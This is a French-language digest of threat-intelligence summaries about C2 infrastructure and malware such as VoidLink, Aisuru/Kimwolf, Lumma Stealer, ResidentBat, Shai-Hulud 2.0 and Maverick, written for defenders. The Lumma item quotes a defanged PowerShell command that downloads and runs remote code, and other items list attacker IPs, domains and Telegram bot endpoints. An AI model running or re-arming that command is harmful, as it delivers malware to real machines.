C2

Selon Check Point Research, VoidLink est un framework malware « cloud-first » pour Linux, repéré en décembre 2025, en cours d’évolution rapide et attribué à des développeurs affiliés à la Chine (affiliation exacte incertaine). Les échantillons observés contiennent des artefacts de développement, une architecture modulaire ambitieuse et une documentation suggérant un usage commercial potentiel, sans preuve d’infections en conditions réelles à la date de publication. • Vue d’ensemble 🐧☁️: VoidLink est un implant écrit en Zig, pensé pour les environnements modernes (AWS, GCP, Azure, Alibaba, Tencent) et capable de détecter Docker/Kubernetes pour adapter son comportement. Il collecte des métadonnées cloud, profile le système/hyperviseur et cible aussi des éléments tels que les identifiants de dépôt Git, indiquant un intérêt possible pour les postes d’ingénieurs et la chaîne d’approvisionnement. Objectif principal: accès furtif et durable, surveillance et exfiltration de données. ...

Selon Black Lotus Labs (Lumen Technologies), l’opérateur a observé fin 2025 une croissance fulgurante du botnet Aisuru (jusqu’à >11 Tbps), puis l’apparition d’un nouveau botnet Kimwolf, alimenté par l’exploitation de services de proxy résidentiel. Lumen décrit ses actions de disruption (null-routing) ayant permis de neutraliser plus de 550 serveurs C2. — Contexte et montée en puissance — En septembre 2025, Aisuru passe d’environ 50 000 à 200 000 bots/jour, corrélé à des attaques records (>11 Tbps). Un backend C2 d’Aisuru (65.108.5[.]46) agit comme entonnoir de trafic depuis les C2 confirmés. Des connexions SSH depuis des IP canadiennes vers 194.46.59[.]169 (proxy-sdk.14emeliaterracewestroxburyma02132[.]su) suggèrent une interface de contrôle. Le backend adopte ensuite le domaine client.14emeliaterracewestroxburyma02132[.]su. — Bifurcation vers Kimwolf — ...

Source: billet signé par Brad Duncan (publié le 14 janvier 2026). Contexte: l’auteur documente en laboratoire un exemple d’infection Lumma Stealer présentant un comportement post-infection inhabituel qui génère une hausse continue de trafic vers un même domaine C2. Après l’exfiltration des données par Lumma Stealer, l’hôte Windows infecté récupère des instructions depuis un lien Pastebin (hxxps[:]//pastebin[.]com/raw/xRmmdinT) utilisées pour une infection de suivi. Le contenu Pastebin renvoie une commande PowerShell: irm hxxps[:]//fileless-market[.]cc/Notes.pdf | iex, entraînant des requêtes HTTPS répétées vers hxxps[:]//fileless-market[.]cc/. ...

Selon RSF Digital Security Lab (Reporters sans frontières), en collaboration avec RESIDENT.NGO et avec un appui d’Amnesty International Security Lab, un nouveau spyware Android nommé « ResidentBat » a été mis au jour après l’infection du téléphone d’un journaliste biélorusse au T3 2025, consécutive à une saisie par le KGB. • Le spyware, empaqueté en APK et installé via accès physique (pas d’exploits), abuse de permissions étendues et d’un service d’accessibilité pour collecter des SMS, appels entrants/sortants (avec enregistrement d’appels), fichiers, photos/vidéos, microphone, captures d’écran/vidéo (MediaProjection), presse-papiers (jusqu’à Android 10), localisation, notifications et contenus d’apps (messageries comme Telegram, Viber, Skype, VK, Signal, WhatsApp, etc.). Il se déclare Device Admin, peut verrouiller ou effacer l’appareil, et persiste en service au premier plan. ...

Source : Censys (blog, 15 déc. 2025). Le billet de Silas Cutler enquête sur l’infrastructure derrière les attaques de DDoSia, outil DDoS participatif opéré par le groupe pro-russe NoName057(16), et documente son fonctionnement, son ciblage, ainsi que les effets de la perturbation par les forces de l’ordre en juillet 2025. • Contexte et mode opératoire DDoSia, lancé en mars 2022 sur Telegram, est un outil de déni de service distribué s’appuyant sur des volontaires (ordinateurs personnels, serveurs loués, hôtes compromis). La distribution passe par des binaires Golang multi-plateformes (le nom interne « Go‑Stresser » est mentionné), avec des versions historiques Python. Des liens OSINT suggèrent un prédécesseur possible via le malware Bobik (2020). Les volontaires ne choisissent pas les cibles ; la motivation est entretenue par des récompenses financières et une propagande pro‑Russie sur Telegram. ...

Source: NVISO – Depuis octobre 2025, le SOC de NVISO a observé quatre tentatives d’intrusion exploitant Telegram, et propose une analyse des modes d’abus de la plateforme ainsi que des pistes concrètes de détection et de chasse. • Fonctionnement et abus de Telegram: la messagerie cloud, ses bots (créés via @BotFather) et ses canaux sont détournés pour leurs avantages opérationnels. Des malwares intègrent des bot tokens et chat/channel IDs, et appellent des endpoints clés comme /getMe, /sendMessage, /sendDocument, /getUpdates, /getWebhookInfo et /deleteWebhook (dont /deleteWebhook?drop_pending_updates=true pour purger l’historique des commandes), afin d’assurer fiabilité, anonymat et résilience côté attaquant. ...

Selon Help Net Security, des chercheurs de Malanta décrivent une opération de longue durée qui combine jeux d’argent illicites, distribution de malwares et détournement d’infrastructures légitimes pour fournir une infrastructure de commande et contrôle (C2) et des services d’anonymat. L’opération, en activité depuis au moins 14 ans, cible notamment des internautes en Indonésie et exploite des sous-domaines d’entités gouvernementales et d’entreprises. L’ampleur est majeure: 328 039 domaines au total, dont 236 433 domaines achetés, 90 125 sites piratés et 1 481 sous-domaines détournés. Les chercheurs relient également des milliers d’applications Android malveillantes, 38 comptes GitHub hébergeant des web-shells, modèles et artefacts de staging, ainsi que 500+ domaines typosquattés se faisant passer pour des organisations populaires. ...

Source: Trend Micro (blog de recherche Trend Vision One). Contexte: poursuite de l’enquête sur l’attaque supply chain NPM du 15 septembre et nouveaux incidents signalés le 24 novembre avec des centaines de dépôts mentionnant Sha1‑Hulud: The Second Coming. L’analyse décrit un malware Shai‑hulud 2.0 ciblant les écosystèmes cloud et développeurs. Il vole des identifiants et secrets de AWS, GCP, Azure, ainsi que des tokens NPM et jetons GitHub, et exploite les services de gestion de secrets (AWS Secrets Manager, GCP Secret Manager, Azure Key Vault). Il met en place un C2 via GitHub Actions (création d’un dépôt contrôlé par l’attaquant sous le compte de la victime, déploiement d’un runner auto‑hébergé nommé SHA1HULUD, workflows de commande), et inclut un mécanisme destructif effaçant les données si le vol d’identifiants échoue. ☁️🪱 ...

Source: NVISO (blog). Dans un billet signé par Maxime, NVISO présente une analyse technique de VShell, un outil d’intrusion en langue chinoise observé dans des activités d’espionnage à long terme, avec un suivi d’infrastructure mené sur plusieurs mois et des notifications de victimes réalisées avec l’appui de Team Cymru. NVISO indique que VShell est utilisé par plusieurs acteurs (étatiques et indépendants). Plusieurs intrusions ont été publiquement attribuées à UNC5174 (supposé courtier d’accès initial lié au MSS chinois), souvent via l’exploitation de systèmes exposés. Toutefois, la disponibilité publique et l’usage élargi de VShell empêchent une attribution exclusive à UNC5174. L’activité observée augmente en Amérique du Sud, Afrique et APAC. ...

Selon Securelist (Kaspersky), des chercheurs ont mis au jour « Maverick », un trojan bancaire sophistiqué diffusé via WhatsApp au Brésil. En octobre (10 premiers jours), la campagne a été suffisamment active pour que 62 000 tentatives d’infection soient bloquées. Le malware s’appuie sur une chaîne d’infection entièrement fileless et se propage en détournant des comptes WhatsApp grâce à WPPConnect. La campagne utilise des archives ZIP contenant des fichiers LNK malveillants comme vecteur initial. Ces LNK exécutent des scripts PowerShell obfusqués avec une validation de User-Agent personnalisée. La charge est traitée en plusieurs étapes: payloads chiffrés par XOR (clé stockée en fin de fichier), emballés en shellcode Donut, et exécutés via .NET et PowerShell. Le code présente des recoupements significatifs avec le trojan bancaire Coyote et inclut des éléments de développement assisté par IA. ...